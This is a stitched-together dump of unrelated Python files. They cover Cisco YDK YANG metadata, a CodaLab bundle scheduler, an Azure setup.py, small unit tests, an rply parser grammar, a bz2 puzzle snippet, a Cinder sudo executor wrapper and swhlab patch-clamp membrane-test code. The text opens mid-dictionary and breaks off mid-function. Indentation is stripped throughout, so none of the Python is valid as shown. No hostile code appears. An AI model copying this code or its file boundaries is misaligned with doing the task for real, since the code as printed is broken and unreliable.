'Cisco-IOS-XR-shellutil-filesystem-oper', False),
_MetaInfoClassMember('free', ATTRIBUTE, 'str' , None, None,
[], [],
''' Free space in the file system in bytes
''',
'free',
'Cisco-IOS-XR-shellutil-filesystem-oper', False),
_MetaInfoClassMember('prefixes', ATTRIBUTE, 'str' , None, None,
[], [],
''' Prefixes of file system
''',
'prefixes',
'Cisco-IOS-XR-shellutil-filesystem-oper', False),
_MetaInfoClassMember('size', ATTRIBUTE, 'str' , None, None,
[], [],
''' Size of the file system in bytes
''',
'size',
'Cisco-IOS-XR-shellutil-filesystem-oper', False),
_MetaInfoClassMember('type', ATTRIBUTE, 'str' , None, None,
[], [],
''' Type of file system
''',
'type',
'Cisco-IOS-XR-shellutil-filesystem-oper', False),
],
'Cisco-IOS-XR-shellutil-filesystem-oper',
'file-system',
_yang_ns._namespaces['Cisco-IOS-XR-shellutil-filesystem-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_shellutil_filesystem_oper'
),
},
'FileSystem.Node' : {
'meta_info' : _MetaInfoClass('FileSystem.Node',
False,
[
_MetaInfoClassMember('node-name', ATTRIBUTE, 'str' , None, None,
[], ['([a-zA-Z0-9_]*\\d+/){1,2}([a-zA-Z0-9_]*\\d+)'],
''' Node name
''',
'node_name',
'Cisco-IOS-XR-shellutil-filesystem-oper', True),
_MetaInfoClassMember('file-system', REFERENCE_LIST, 'FileSystem_' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_shellutil_filesystem_oper', 'FileSystem.Node.FileSystem_',
[], [],
''' Available file systems
''',
'file_system',
'Cisco-IOS-XR-shellutil-filesystem-oper', False),
],
'Cisco-IOS-XR-shellutil-filesystem-oper',
'node',
_yang_ns._namespaces['Cisco-IOS-XR-shellutil-filesystem-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_shellutil_filesystem_oper'
),
},
'FileSystem' : {
'meta_info' : _MetaInfoClass('FileSystem',
False,
[
_MetaInfoClassMember('node', REFERENCE_LIST, 'Node' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_shellutil_filesystem_oper', 'FileSystem.Node',
[], [],
''' Node ID
''',
'node',
'Cisco-IOS-XR-shellutil-filesystem-oper', False),
],
'Cisco-IOS-XR-shellutil-filesystem-oper',
'file-system',
_yang_ns._namespaces['Cisco-IOS-XR-shellutil-filesystem-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_shellutil_filesystem_oper'
),
},
}
_meta_table['FileSystem.Node.FileSystem_']['meta_info'].parent =_meta_table['FileSystem.Node']['meta_info']
_meta_table['FileSystem.Node']['meta_info'].parent =_meta_table['FileSystem']['meta_info']
|
import datetime
import logging
import os
import random
import re
import sys
import threading
import time
import traceback
from codalab.objects.permission import check_bundles_have_read_permission
from codalab.common import PermissionError
from codalab.lib import bundle_util, formatting, path_util
from codalabworker.file_util import remove_path
from codalabworker.bundle_state import State
logger = logging.getLogger(__name__)
WORKER_TIMEOUT_SECONDS = 60
class BundleManager(object):
"""
    Assigns run bundles to workers and creates make bundles.
"""
@staticmethod
def create(codalab_manager):
config = codalab_manager.config.get('workers')
if not config:
print >>sys.stderr, 'config.json file missing a workers section.'
exit(1)
from codalab.worker.default_bundle_manager import DefaultBundleManager
self = DefaultBundleManager()
self._model = codalab_manager.model()
self._worker_model = codalab_manager.worker_model()
self._bundle_store = codalab_manager.bundle_store()
self._upload_manager = codalab_manager.upload_manager()
self._exiting_lock = threading.Lock()
self._exiting = False
self._make_uuids_lock = threading.Lock()
self._make_uuids = set()
def parse(to_value, field):
return to_value(config[field]) if field in config else None
self._max_request_time = parse(formatting.parse_duration, 'max_request_time')
self._max_request_memory = parse(formatting.parse_size, 'max_request_memory')
self._max_request_disk = parse(formatting.parse_size, 'max_request_disk')
self._default_cpu_image = config.get('default_cpu_image')
self._default_gpu_image = config.get('default_gpu_image')
logging.basicConfig(format='%(asctime)s %(message)s', level=logging.INFO)
return self
def run(self, sleep_time):
logger.info('Bundle manager running.')
while not self._is_exiting():
try:
self._run_iteration()
except Exception:
traceback.print_exc()
time.sleep(sleep_time)
while self._is_making_bundles():
time.sleep(sleep_time)
def signal(self):
with self._exiting_lock:
self._exiting = True
def _is_exiting(self):
with self._exiting_lock:
return self._exiting
def _run_iteration(self):
self._stage_bundles()
self._make_bundles()
self._schedule_run_bundles()
def _schedule_run_bundles(self):
"""
        Subclasses should implement this. See DefaultBundleManager.
"""
raise NotImplementedError
def _stage_bundles(self):
"""
Stages bundles by:
1) Failing any bundles that have any missing or failed dependencies.
2) Staging any bundles that have all ready dependencies.
"""
bundles = self._model.batch_get_bundles(state=State.CREATED)
parent_uuids = set(dep.parent_uuid for bundle in bundles for dep in bundle.dependencies)
parents = self._model.batch_get_bundles(uuid=parent_uuids)
all_parent_states = {parent.uuid: parent.state for parent in parents}
all_parent_uuids = set(all_parent_states)
bundles_to_fail = []
bundles_to_stage = []
for bundle in bundles:
parent_uuids = set(dep.parent_uuid for dep in bundle.dependencies)
try:
check_bundles_have_read_permission(
self._model, self._model.get_user(bundle.owner_id), parent_uuids
)
except PermissionError as e:
bundles_to_fail.append((bundle, str(e)))
continue
missing_uuids = parent_uuids - all_parent_uuids
if missing_uuids:
bundles_to_fail.append(
(bundle, 'Missing parent bundles: %s' % ', '.join(missing_uuids))
)
continue
parent_states = {uuid: all_parent_states[uuid] for uuid in parent_uuids}
acceptable_states = [State.READY]
if bundle.metadata.allow_failed_dependencies:
acceptable_states.append(State.FAILED)
acceptable_states.append(State.KILLED)
else:
failed_uuids = [
uuid for uuid, state in parent_states.iteritems() if state == State.FAILED
]
killed_uuids = [
uuid for uuid, state in parent_states.iteritems() if state == State.KILLED
]
failure_message = ''
if failed_uuids:
failure_message += ' Parent bundles failed: %s' % ', '.join(failed_uuids)
if killed_uuids:
failure_message += ' Parent bundles were killed: %s' % ', '.join(killed_uuids)
if failure_message:
                    failure_message += ' (Please use the --allow-failed-dependencies flag to depend on results of failed or killed bundles)'
bundles_to_fail.append((bundle, failure_message))
continue
if all(state in acceptable_states for state in parent_states.itervalues()):
bundles_to_stage.append(bundle)
for bundle, failure_message in bundles_to_fail:
logger.info('Failing bundle %s: %s', bundle.uuid, failure_message)
self._model.update_bundle(
bundle, {'state': State.FAILED, 'metadata': {'failure_message': failure_message}}
)
for bundle in bundles_to_stage:
logger.info('Staging %s', bundle.uuid)
self._model.update_bundle(bundle, {'state': State.STAGED})
def _make_bundles(self):
# Re-stage any stuck bundles. This would happen if the bundle manager
# died.
for bundle in self._model.batch_get_bundles(state=State.MAKING, bundle_type='make'):
if not self._is_making_bundle(bundle.uuid):
logger.info('Re-staging make bundle %s', bundle.uuid)
self._model.update_bundle(bundle, {'state': State.STAGED})
for bundle in self._model.batch_get_bundles(state=State.STAGED, bundle_type='make'):
logger.info('Making bundle %s', bundle.uuid)
self._model.update_bundle(bundle, {'state': State.MAKING})
with self._make_uuids_lock:
self._make_uuids.add(bundle.uuid)
# Making a bundle could take time, so do the work in a separate
# thread to ensure quick scheduling.
threading.Thread(target=BundleManager._make_bundle, args=[self, bundle]).start()
def _is_making_bundles(self):
with self._make_uuids_lock:
return bool(self._make_uuids)
def _is_making_bundle(self, uuid):
with self._make_uuids_lock:
return uuid in self._make_uuids
def _make_bundle(self, bundle):
try:
path = os.path.normpath(self._bundle_store.get_bundle_location(bundle.uuid))
deps = []
for dep in bundle.dependencies:
parent_bundle_path = os.path.normpath(
self._bundle_store.get_bundle_location(dep.parent_uuid)
)
dependency_path = os.path.normpath(
os.path.join(parent_bundle_path, dep.parent_path)
)
if not dependency_path.startswith(parent_bundle_path) or (
not os.path.islink(dependency_path) and not os.path.exists(dependency_path)
):
raise Exception(
'Invalid dependency %s'
% (path_util.safe_join(dep.parent_uuid, dep.parent_path))
)
child_path = os.path.normpath(os.path.join(path, dep.child_path))
if not child_path.startswith(path):
raise Exception('Invalid key for dependency: %s' % (dep.child_path))
deps.append((dependency_path, child_path))
remove_path(path)
if len(deps) == 1 and deps[0][1] == path:
path_util.copy(deps[0][0], path, follow_symlinks=False)
else:
os.mkdir(path)
for dependency_path, child_path in deps:
path_util.copy(dependency_path, child_path, follow_symlinks=False)
self._upload_manager.update_metadata_and_save(bundle, enforce_disk_quota=True)
logger.info('Finished making bundle %s', bundle.uuid)
self._model.update_bundle(bundle, {'state': State.READY})
except Exception as e:
logger.info('Failing bundle %s: %s', bundle.uuid, str(e))
self._model.update_bundle(
bundle, {'state': State.FAILED, 'metadata': {'failure_message': str(e)}}
)
finally:
with self._make_uuids_lock:
self._make_uuids.remove(bundle.uuid)
def _cleanup_dead_workers(self, workers, callback=None):
"""
        Clean up workers that we haven't heard from for more than WORKER_TIMEOUT_SECONDS seconds.
Such workers probably died without checking out properly.
"""
for worker in workers.workers():
if datetime.datetime.now() - worker['checkin_time'] > datetime.timedelta(
seconds=WORKER_TIMEOUT_SECONDS
):
logger.info(
'Cleaning up dead worker (%s, %s)', worker['user_id'], worker['worker_id']
)
self._worker_model.worker_cleanup(worker['user_id'], worker['worker_id'])
workers.remove(worker)
if callback is not None:
callback(worker)
def _restage_stuck_starting_bundles(self, workers):
"""
Moves bundles that got stuck in the STARTING state back to the STAGED
state so that they can be scheduled to run again.
"""
for bundle in self._model.batch_get_bundles(state=State.STARTING, bundle_type='run'):
if (
not workers.is_running(bundle.uuid)
or time.time() - bundle.metadata.last_updated > 5 * 60
): # Run message went missing.
logger.info('Re-staging run bundle %s', bundle.uuid)
if self._model.restage_bundle(bundle):
workers.restage(bundle.uuid)
def _acknowledge_recently_finished_bundles(self, workers):
"""
Acknowledges recently finished bundles to workers so they can discard run information
"""
for bundle in self._model.batch_get_bundles(state=State.FINALIZING, bundle_type='run'):
worker = workers.get_bundle_worker(bundle.uuid)
if worker is None:
logger.info(
'Bringing bundle offline %s: %s', bundle.uuid, 'No worker claims bundle'
)
self._model.set_offline_bundle(bundle)
elif self._worker_model.send_json_message(
worker['socket_id'], {'type': 'mark_finalized', 'uuid': bundle.uuid}, 0.2
):
                logger.info('Acknowledged finalization of run bundle %s', bundle.uuid)
self._model.finish_bundle(bundle)
def _bring_offline_stuck_running_bundles(self, workers):
"""
Make bundles that got stuck in the RUNNING or PREPARING state into WORKER_OFFLINE state.
Bundles in WORKER_OFFLINE state can be moved back to the RUNNING or PREPARING state if a
worker resumes the bundle indicating that it's still in one of those states.
"""
active_bundles = self._model.batch_get_bundles(
state=State.RUNNING, bundle_type='run'
) + self._model.batch_get_bundles(state=State.PREPARING, bundle_type='run')
now = time.time()
for bundle in active_bundles:
failure_message = None
if not workers.is_running(bundle.uuid):
failure_message = 'No worker claims bundle'
if now - bundle.metadata.last_updated > WORKER_TIMEOUT_SECONDS:
failure_message = 'Worker offline'
if failure_message is not None:
logger.info('Bringing bundle offline %s: %s', bundle.uuid, failure_message)
self._model.set_offline_bundle(bundle)
def _schedule_run_bundles_on_workers(self, workers, user_owned):
"""
Schedules STAGED bundles to run on the given workers. If user_owned is
True, then schedules on workers run by the owner of each bundle.
Otherwise, uses CodaLab-owned workers, which have user ID root_user_id.
"""
for bundle in self._model.batch_get_bundles(state=State.STAGED, bundle_type='run'):
if user_owned:
workers_list = workers.user_owned_workers(bundle.owner_id)
else:
workers_list = workers.user_owned_workers(self._model.root_user_id)
workers_list = self._filter_and_sort_workers(workers_list, bundle)
for worker in workers_list:
if self._try_start_bundle(workers, worker, bundle):
break
else:
continue # Try the next worker.
def _deduct_worker_resources(self, workers_list):
"""
From each worker, subtract resources used by running bundles. Modifies the list.
"""
for worker in workers_list:
for uuid in worker['run_uuids']:
bundle = self._model.get_bundle(uuid)
worker['cpus'] -= self._compute_request_cpus(bundle)
worker['gpus'] -= self._compute_request_gpus(bundle)
worker['memory_bytes'] -= self._compute_request_memory(bundle)
def _filter_and_sort_workers(self, workers_list, bundle):
"""
Filters the workers to those that can run the given bundle and returns
the list sorted in order of preference for running the bundle.
"""
# keep track of which workers have GPUs
has_gpu = {}
for worker in workers_list:
worker_id = worker['worker_id']
has_gpu[worker_id] = worker['gpus'] > 0
# deduct worker resources based on running bundles
self._deduct_worker_resources(workers_list)
# Filter by CPUs.
request_cpus = self._compute_request_cpus(bundle)
if request_cpus:
workers_list = filter(lambda worker: worker['cpus'] >= request_cpus, workers_list)
# Filter by GPUs.
request_gpus = self._compute_request_gpus(bundle)
if request_gpus:
workers_list = filter(lambda worker: worker['gpus'] >= request_gpus, workers_list)
# Filter by memory.
request_memory = self._compute_request_memory(bundle)
if request_memory:
workers_list = filter(
lambda worker: worker['memory_bytes'] >= request_memory, workers_list
)
# Filter by tag.
request_queue = bundle.metadata.request_queue
if request_queue:
tagm = re.match('tag=(.+)', request_queue)
if tagm:
workers_list = filter(lambda worker: worker['tag'] == tagm.group(1), workers_list)
else:
# We don't know how to handle this type of request queue
# argument.
return []
# Sort workers list according to these keys in the following succession:
# - whether the worker is a CPU-only worker, if the bundle doesn't request GPUs
# - number of dependencies available, descending
# - number of free cpus, descending
# - random key
#
# Breaking ties randomly is important, since multiple workers frequently
# have the same number of dependencies and free CPUs for a given bundle
# (in particular, bundles with no dependencies) and we may end up
# selecting the same worker over and over again for new jobs. While this
# is not a problem for the performance of the jobs themselves, this can
# cause one worker to collect a disproportionate number of dependencies
# in its cache.
needed_deps = set(map(lambda dep: (dep.parent_uuid, dep.parent_path), bundle.dependencies))
def get_sort_key(worker):
deps = set(worker['dependencies'])
worker_id = worker['worker_id']
# if the bundle doesn't request GPUs (only request CPUs), prioritize workers that don't have GPUs
gpu_priority = self._compute_request_gpus(bundle) or not has_gpu[worker_id]
return (gpu_priority, len(needed_deps & deps), worker['cpus'], random.random())
workers_list.sort(key=get_sort_key, reverse=True)
return workers_list
def _try_start_bundle(self, workers, worker, bundle):
"""
Tries to start running the bundle on the given worker, returning False
if that failed.
"""
if self._model.set_starting_bundle(bundle, worker['user_id'], worker['worker_id']):
workers.set_starting(bundle.uuid, worker)
if (
self._worker_model.shared_file_system
and worker['user_id'] == self._model.root_user_id
):
# On a shared file system we create the path here to avoid NFS
# directory cache issues.
path = self._bundle_store.get_bundle_location(bundle.uuid)
remove_path(path)
os.mkdir(path)
if self._worker_model.send_json_message(
worker['socket_id'], self._construct_run_message(worker, bundle), 0.2
):
logger.info('Starting run bundle %s', bundle.uuid)
return True
else:
self._model.restage_bundle(bundle)
workers.restage(bundle.uuid)
return False
else:
return False
def _compute_request_cpus(self, bundle):
"""
Compute the CPU limit used for scheduling the run.
        The default of 1 is for backwards compatibility with
        runs from before we added client-side defaults.
"""
if not bundle.metadata.request_cpus:
return 1
return bundle.metadata.request_cpus
def _compute_request_gpus(self, bundle):
"""
Compute the GPU limit used for scheduling the run.
        The default of 0 is for backwards compatibility with
        runs from before we added client-side defaults.
"""
if bundle.metadata.request_gpus is None:
return 0
return bundle.metadata.request_gpus
def _compute_request_memory(self, bundle):
"""
Compute the memory limit used for scheduling the run.
        The default of 2g is for backwards compatibility with
        runs from before we added client-side defaults.
"""
if not bundle.metadata.request_memory:
return formatting.parse_size('2g')
return formatting.parse_size(bundle.metadata.request_memory)
def _compute_request_disk(self, bundle):
"""
Compute the disk limit used for scheduling the run.
The default is min(disk quota the user has left, global max)
"""
if not bundle.metadata.request_disk:
return min(
self._model.get_user_disk_quota_left(bundle.owner_id) - 1, self._max_request_disk
)
return formatting.parse_size(bundle.metadata.request_disk)
def _compute_request_time(self, bundle):
"""
Compute the time limit used for scheduling the run.
The default is min(time quota the user has left, global max)
"""
if not bundle.metadata.request_time:
return min(
self._model.get_user_time_quota_left(bundle.owner_id) - 1, self._max_request_time
)
return formatting.parse_duration(bundle.metadata.request_time)
def _get_docker_image(self, bundle):
"""
Set docker image to be the default if not specified
        Unlike other metadata fields, this can actually be None
        from the client.
"""
if not bundle.metadata.request_docker_image:
if bundle.metadata.request_gpus:
return self._default_gpu_image
else:
return self._default_cpu_image
return bundle.metadata.request_docker_image
def _construct_run_message(self, worker, bundle):
"""
Constructs the run message that is sent to the given worker to tell it
to run the given bundle.
"""
message = {}
message['type'] = 'run'
message['bundle'] = bundle_util.bundle_to_bundle_info(self._model, bundle)
if self._worker_model.shared_file_system and worker['user_id'] == self._model.root_user_id:
message['bundle']['location'] = self._bundle_store.get_bundle_location(bundle.uuid)
for dependency in message['bundle']['dependencies']:
dependency['location'] = self._bundle_store.get_bundle_location(
dependency['parent_uuid']
)
# Figure out the resource requirements.
resources = message['resources'] = {}
resources['request_cpus'] = self._compute_request_cpus(bundle)
resources['request_gpus'] = self._compute_request_gpus(bundle)
resources['docker_image'] = self._get_docker_image(bundle)
resources['request_time'] = self._compute_request_time(bundle)
resources['request_memory'] = self._compute_request_memory(bundle)
resources['request_disk'] = self._compute_request_disk(bundle)
resources['request_network'] = bundle.metadata.request_network
return message
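# The resulting message has the form (derived from the code above):
#     {'type': 'run', 'bundle': {...},
#      'resources': {'request_cpus': ..., 'request_gpus': ..., 'docker_image': ...,
#                    'request_time': ..., 'request_memory': ..., 'request_disk': ...,
#                    'request_network': ...}}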
|
#!/usr/bin/env python
#-------------------------------------------------------------------------
# Copyright (c) Microsoft. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#--------------------------------------------------------------------------
from setuptools import setup
# azure v0.x is not compatible with this package
# azure v0.x used to have a __version__ attribute (newer versions don't)
try:
import azure
try:
ver = azure.__version__
raise Exception(
'This package is incompatible with azure=={}. '.format(ver) +
'Uninstall it with "pip uninstall azure".'
)
except AttributeError:
pass
except ImportError:
pass
setup(
name='azure-servicemanagement-legacy',
version='0.20.3',
description='Microsoft Azure Legacy Service Management Client Library for Python',
long_description=open('README.rst', 'r').read(),
license='Apache License 2.0',
author='Microsoft Corporation',
author_email='ptvshelp@microsoft.com',
url='https://github.com/Azure/azure-sdk-for-python',
classifiers=[
'Development Status :: 4 - Beta',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'License :: OSI Approved :: Apache Software License',
],
zip_safe=False,
packages=[
'azure',
'azure.servicemanagement',
'azure.servicemanagement._http',
],
install_requires=[
'azure-common',
'requests',
],
extras_require = {
'get_certificate_from_publish_settings' : ['pyopenssl']
},
)
|
import gron
def test_version():
assert hasattr(gron, '__VERSION__')
|
# Copyright 2016-2019 California Institute of Technology.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ..oceancolor import OceanColor
import os
from nose.tools import assert_raises
import unittest
class TestOceanColor(unittest.TestCase):
@classmethod
def setUp(self):
self.oceancolor = OceanColor()
# test case for the function file_search()
def test_file_search(self):
data = self.oceancolor.file_search(sensor='octs', sdate='1996-11-01', edate='1997-01-01',
dtype='L3b', add_url='1', results_as_file='1', search='*DAY_CHL*')
assert data != None
print(data)
assert type(data) is type(u'')
assert len(data) != 0
# must have a valid sensor AND either 'search' OR 'sub-id'
data2 = self.oceancolor.file_search(sensor='octs', sub_id='2218')
assert data2 != None
assert_raises(Exception, self.oceancolor.file_search, sensor='random')
assert_raises(Exception, self.oceancolor.file_search, sdate='1996-11-01', edate='1997-01-01',
dtype='L3b', add_url='1', results_as_file='1', search='*DAY_CHL*')
    # test case for the function get_file()
def test_get_file(self):
url = 'https://oceandata.sci.gsfc.nasa.gov/cgi/getfile/O1996307.L3b_DAY_CHL.nc'
path = os.path.dirname(os.path.abspath(__file__))
granule_name = self.oceancolor.get_file(url, path)
assert granule_name != None
assert_raises(Exception, self.oceancolor.get_file,
url='ABCDEF')
path = os.path.join(os.path.dirname(__file__), granule_name)
os.remove(path)
|
from rply import ParserGenerator
from poketype.ast import Number, Boolean, NegNumber
class DataTypes():
def __init__(self, pg: ParserGenerator) -> None:
@pg.production('expression : NUMBER')
def expression_number(p):
return Number(int(p[0].getstr()))
@pg.production('expression : BOOLEAN')
        def expression_boolean(p):
b_val = p[0].getstr()
if b_val == "true":
return Boolean(True)
else:
return Boolean(False)
@pg.production('expression : NEG NUMBER')
def expression_number_neg(p):
            b_val = p[1].getstr()
            return NegNumber(int(b_val) * -1)
|
#!/usr/bin/env python
un='BZh91AY&SYA\xaf\x82\r\x00\x00\x01\x01\x80\x02\xc0\x02\x00 \x00!\x9ah3M\x07<]\xc9\x14\xe1BA\x06\xbe\x084'
pw='BZh91AY&SY\x94$|\x0e\x00\x00\x00\x81\x00\x03$ \x00!\x9ah3M\x13<]\xc9\x14\xe1BBP\x91\xf08'
import bz2
print bz2.BZ2Decompressor().decompress(un)
# huge
print bz2.BZ2Decompressor().decompress(pw)
# file
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Generic exec utility that allows us to set the
execute and root_helper attributes for putils.
Some projects need their own execute wrapper
and root_helper settings, so this provides that hook.
"""
from cinder.openstack.common import processutils as putils
class Executor(object):
def __init__(self, execute=putils.execute, root_helper="sudo",
*args, **kwargs):
self.set_execute(execute)
self.set_root_helper(root_helper)
def set_execute(self, execute):
self._execute = execute
def set_root_helper(self, helper):
self._root_helper = helper
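# Usage sketch (assumption: processutils.execute accepts root_helper/run_as_root
# keyword arguments, as in oslo-style process utilities):
#     class ListDevices(Executor):
#         def list_devices(self):
#             return self._execute('ls', '/dev', root_helper=self._root_helper,
#                                  run_as_root=True)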
|
"""
Membrane test routines for voltage clamp experiments.
creates abf.MTs[sweep]={} #with keys like Ih, Ra, Rm, etc
Example usage:
abf=swhlab.ABF('../abfs/group/16701010.abf')
swhlab.memtest.memtest(abf) #performs memtest on all sweeps
swhlab.memtest.checkSweep(abf) #lets you eyeball check how it did
pylab.show()
"""
import os
import sys
import pylab
import numpy as np
import time
import swhlab
import swhlab.core.common as cm
exampleABF=swhlab.ABF()
def memtestSweepVC(abf=exampleABF):
"""
perform memtest on current sweep in VC mode. Return Ih, Ra, Rm, etc.
All variable names are explained in /swhlab/docs/memtest.ppt
"""
if abf.protoSeqY[1]>abf.protoSeqY[0] or len(abf.protoSeqY)<3:
return "protocol doesn't step down and back up"
TA,TB=int(abf.protoSeqX[1]),int(abf.protoSeqX[2])
dT=int(TB-TA)
T1A=int(TA+.5*dT)
T1B=int(TA+.9*dT)
T2A=T1A+dT
T2B=T1B+dT
P1=np.average(abf.dataY[T1A:T1B])
P2=np.average(abf.dataY[T2A:T2B])
dI=P2-P1
dV=abf.protoSeqY[2]-abf.protoSeqY[1]
PP=np.max(abf.dataY[TB:TB+100])# peak found within first 100 points
TP=np.where(abf.dataY[TB:TB+150]==PP)[0][0]+TB
dP=PP-P1
dTC=PP-P2
PCA=P2+.9*dTC # upper fraction for Cm detection
PCB=P2+.1*dTC # upper fraction for Cm detection
PCtau=P2+.37*dTC # crossing point of theoretical tau
TCA=np.where(abf.dataY[TP:T2A]<PCA)[0][0]+TP
TCB=np.where(abf.dataY[TP:T2A]<PCB)[0][0]+TP
dTCT=TCB-TCA #number of points available for fitting
Ih=P2
Ra=(dV*10**3)/(PP-P2) #MOhm=uV/pA
Rm=(dV*10**3)/(P2-P1) #MOhm=uV/pA
fitM,fitT,fitB,fitTau=cm.fit_exp(abf.dataY[TCA:TCB]) #same units as given
fitTau=fitTau*1000/abf.rate #time constant convert to ms units
Tv=fitTau #time constant of extrinsic voltage clamp
Cm=Tv/Ra*1000 #us/MOhm is pF
Tm=Rm*Cm/1000 #time constant of cell membrane (intrinsic voltage clamp)
del abf
return locals()
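# Worked example (added comment, magnitudes only; the code above keeps the signs of
# the raw traces): with a 10 mV step (dV), a 200 pA steady-state current change
# (P2-P1) and a capacitive transient 500 pA beyond the steady state (PP-P2):
#   Rm = dV*10**3 / (P2-P1) = 10*1000/200 = 50 MOhm
#   Ra = dV*10**3 / (PP-P2) = 10*1000/500 = 20 MOhm
#   a fitted tau of 1 ms then gives Cm = Tv/Ra*1000 = 1/20*1000 = 50 pF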
def memtestIC(abf=exampleABF):
"""
IC memtest is different. Make an average sweep, then curve fit it.
This only RETURNS the memtest, it does not assign it.
"""
if abf.protoSeqY[1]>abf.protoSeqY[0] or len(abf.protoSeqY)<3:
return "protocol doesn't step down and back up"
abf.baseline=[abf.protoSeqX[1]/abf.rate*.75,abf.protoSeqX[1]/abf.rate]
T1A,T1B=np.array(abf.baseline)*abf.rate
Xs,Ys,Er=abf.average_sweep()
T2A=abf.protoSeqX[2]-abf.protoSeqX[1]
T2B=abf.protoSeqX[2]
M2=np.average(Ys[T2A:T2B])
MCA=.1*M2 # set 90% here
MCB=.9*M2 # set 10% here
TCA=np.where(Ys<MCA)[0][0]
TCB=np.where(Ys<MCB)[0][0]
m,t,b,tc=cm.fit_exp(Ys[TCA:TCB]) #do the fit!
dI=abs(abf.protoSeqY[2]-abf.protoSeqY[1]) #pA
dV=abs(M2) #mV
Rm=dV/dI*1000 #uV/pA = MOhm
Cm=tc/Rm #ms/MOhm
del abf,Ys,Xs,Er
return locals() #convert to structured array
def memtest(abf=exampleABF,firstSweepOnly=False,plotToo=False,saveToo=True):
"""perform memtest on all sweeps."""
timeStart=time.clock()
if abf.units=="mV":
abf.MTs = memtestIC(abf)
else:
abf.MTs=[None]*abf.sweeps
for sweep in range(abf.sweeps):
abf.setSweep(sweep)
result=memtestSweepVC(abf)
if type(result) is dict:
abf.MTs[abf.currentSweep]=result
else:
print("MEMTEST FAILED - sweep %d -"%sweep,result)
if firstSweepOnly:
return
abf.MTs = cm.matrixfromDicts(abf.MTs) #convert to structured array
took=time.clock()-timeStart
print(" -- memtest performed on %d sweeps in %.02f ms"%(abf.sweeps,took*1000))
if saveToo:
abf.saveThing(abf.MTs,"MTs")
def plot_standard4(abf=exampleABF):
"""make a standard memtest plot showing Ih, Ra, etc. with time."""
if abf.sweeps<2:
return
swhlab.plot.new(abf)
Xs=np.arange(abf.sweeps)*abf.sweepInterval/60
subplots=[221,222,223,224]
features=['Ih','Ra','Rm','Cm']
units=['pA','MOhm','MOhm','pF']
for subplot,feature,unit in zip(subplots,features,units):
pylab.subplot(subplot)
pylab.grid(alpha=.5)
#pylab.title(feature)
pylab.plot(Xs,cm.dictVals(abf.MTs,feature),'.-',alpha=.5)
pylab.xlabel(None)
pylab.ylabel("%s (%s)"%(feature,unit))
swhlab.plot.comments(abf,True)
pylab.margins(0,.1)
def checkSweepIC(abf=exampleABF,sweep=0):
"""Produce an eyeball-ready indication how the MT was calculated in IC."""
_keys = abf.MTs.dtype.names
for key in _keys:
globals()[key]=abf.MTs[key] # only global for this module, that's fine
fitted=cm.algo_exp(np.arange(TCB-TCA),m,t,b)
swhlab.plot.new(abf,forceNewFigure=True)
Xs,Ys,Er=abf.average_sweep()
for subplot in [121,122]:
pylab.subplot(subplot)
pylab.axhline(0,color='b',lw=2,alpha=.5,ls="--")
pylab.axhline(M2,color='b',lw=2,alpha=.5,ls="--")
swhlab.plot.sweep(abf,'all',rainbow=False,color='#CCCCCC',alpha=.5)
pylab.plot(Xs,Ys,color='k',alpha=.5)
pylab.plot(Xs[T1A:T1B],Ys[T1A:T1B],color='b',lw=2)
pylab.plot(Xs[T2A:T2B],Ys[T2A:T2B],color='b',lw=2)
pylab.plot(abf.dataX[TCA:TCB],fitted,color='r',lw=2,ls='--')
pylab.axis([(TCA-100)/abf.rate,(TCB+100)/abf.rate,None,None])
pylab.tight_layout()
msg="tau: %.02f ms\n"%(tc/abf.rate*1000)
msg+="Rm: %.02f MOhm\n"%(Rm)
msg+="Cm: %.02f pF"%(Cm)
pylab.annotate(msg,(.75,.95),ha='left',va='top',weight='bold',family='monospace',
xycoords='figure fraction',size=12,color='g')
swhlab.plot.annotate(abf)
return
def checkSweep(abf=exampleABF,sweep=0):
"""Produce an eyeball-ready indication how the MT was calculated in VC."""
if abf.units=="mV":
return checkSweepIC(abf,sweep)
if abf.MTs[sweep] is None:
return False #no memtest data even found
_keys = abf.MTs[sweep].dtype.names
for key in _keys:
globals()[key]=abf.MTs[sweep][key] # only global for this module, that's fine.
_msg2="Average (n=%d)\n"%abf.sweeps
_msg=""
for i in range(len(_keys)):
_msg+="%s=%s\n"%(_keys[i],abf.MTs[sweep][i])
if _keys[i] in ['Ih','Ra','Rm','Cm','Tv','Tm']:
_msg2+="%s=%.02f\n"%(_keys[i],abf.MTs[sweep][i])
fitted=cm.algo_exp(np.arange(TCB-TCA),fitM,fitT,fitB)
pylab.figure(figsize=(8,8))
for subplot in [211,212]:
pylab.subplot(subplot)
#pylab.plot(abf.dataX,abf.dataY,alpha=.2,color='k',lw=2)
pylab.plot(abf.dataX[:TCA],abf.dataY[:TCA],alpha=.2,color='k',lw=2)
